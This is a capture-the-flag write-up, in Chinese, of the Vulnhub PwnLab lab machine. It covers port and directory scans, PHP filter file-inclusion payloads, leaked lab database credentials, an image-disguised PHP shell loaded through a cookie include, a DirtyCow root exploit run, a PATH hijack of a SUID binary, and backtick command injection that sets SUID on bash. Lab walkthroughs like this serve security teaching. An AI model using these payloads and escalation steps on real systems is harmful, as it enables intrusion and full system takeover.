0%

Vulnhub-PwnLab

靶机下载链接

0x01 信息收集

namp扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 01:03 EDT
Nmap scan report for 192.168.56.5
Host is up (0.0018s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 40816/udp status
| 100024 1 46341/udp6 status
| 100024 1 48803/tcp status
|_ 100024 1 54404/tcp6 status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 40
| Capabilities flags: 63487
| Some Capabilities: SupportsTransactions, Support41Auth, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, LongPassword, ODBCClient, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsCompression, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: #xU$OEH{UscwOc&0\aT^
|_ Auth Plugin Name: mysql_native_password

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
gobuster dir -u http://192.168.56.5/ -w ~/tools/SecLists/Discovery/Web-Content/big.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.56.5/
[+] Threads: 10
[+] Wordlist: /tools/SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/07/12 14:00:13 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/config.php (Status: 200)
/images (Status: 301)
/index.php (Status: 200)
/login.php (Status: 200)
/server-status (Status: 403)
/upload (Status: 301)
/upload.php (Status: 200)
===============================================================
2020/07/12 14:00:25 Finished
===============================================================

0x02 漏洞利用

一进去就感觉是文件包含。http://192.168.56.5/?page=login根据和扫描出来的文件对比,应该是拼接了php后缀

读取源码,获得数据库的连接密码及其他文件的源码

payload
1
2
3
?page=php://filter/read=convert.base64-encode/resource=./index
?page=php://filter/read=convert.base64-encode/resource=./login
?page=php://filter/read=convert.base64-encode/resource=./config
config
1
2
3
4
5
6
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
index
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
upload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");

if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}

if(strpos($filetype,'image') === false) {
die('Error 001');
}

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}

if(substr_count($filetype, '/')>1){
die('Error 003');
}

$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}

?>

通过审计以上的代码,我们知道了数据库的连接密码,以及如果cookie中有Land键值,index则会去包含lang目录下对应的文件。上传是白名单上传,并且会检测MINE类型和文件头。

看起来是不能直接上传PHP文件了,不过我们可以上传gif后缀的php文件。因为文件包含不在意包含文件的后缀名,只要检测包含文件的内容中有php代码,就会以php方式解析执行。

所以我们的步骤是:

  1. 登录到数据库,查询密码后。
  2. 登录后台,上传恶意gif文件。
  3. 设置cookie。 lang=恶意gif路径
  4. 利用index包含

包含成功。

蚁剑设置cookie

0x03 提权

蚁剑连上后,弹个shell给自己。之前数据库找到的密码,只有这两个用户能切换。

  • kane
  • kent

Walkthrough-1

进行信息收集后,我最后选择了内核提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
[email protected]:~/a$ gcc dc32.c -o cowroot -pthread 2>/dev/null
gcc dc32.c -o cowroot -pthread 2>/dev/null
[email protected]:~/a$ ls
ls
40616.c cowroot dc32.c ofs_64 pokemon.c
[email protected]:~/a$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 53112
Racing, this may take a while..
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
[email protected]:/home/kane/a# whoami
whoami
root
[email protected]:/home/kane/a# cd /root
cd /root
[email protected]:/root# cat flag.txt
cat flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) [email protected] - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'

Walkthrough-2

切换到kane后,会发现有他的家目录下有个二进制程序msgmike,这个程序是mike的suid文件,会检测mike的家目录下有没有mike文件,然后去查看这个文件。

而我们现在是在kane用户,这个程序也没有将cat的路径写死,所以可以考虑劫持cat的环境变量。

1
2
3
4
echo '/bin/bash' > /tmp/cat
export PATH=/tmp:$PATH
chmod +x /tmp/cat
./msgmike

此时应该会变成mike用户。

而mike用户的家目录下又有一个root用户的suid位文件。但是这个程序是请求输入,然后执行echo 用户输入的值 >> /root/msg.txt

嗯哼,可以直接./msg2root运行,并输入`chmod +s /bin/bash` ,使用反引号优先运行chmod +s /bin/bash将bash变成一个root用户的suid位文件。接着,我们就可以在mike用户下执行bash -p获得root权限。

0x04 总结

能代码审计的时候就要细心审。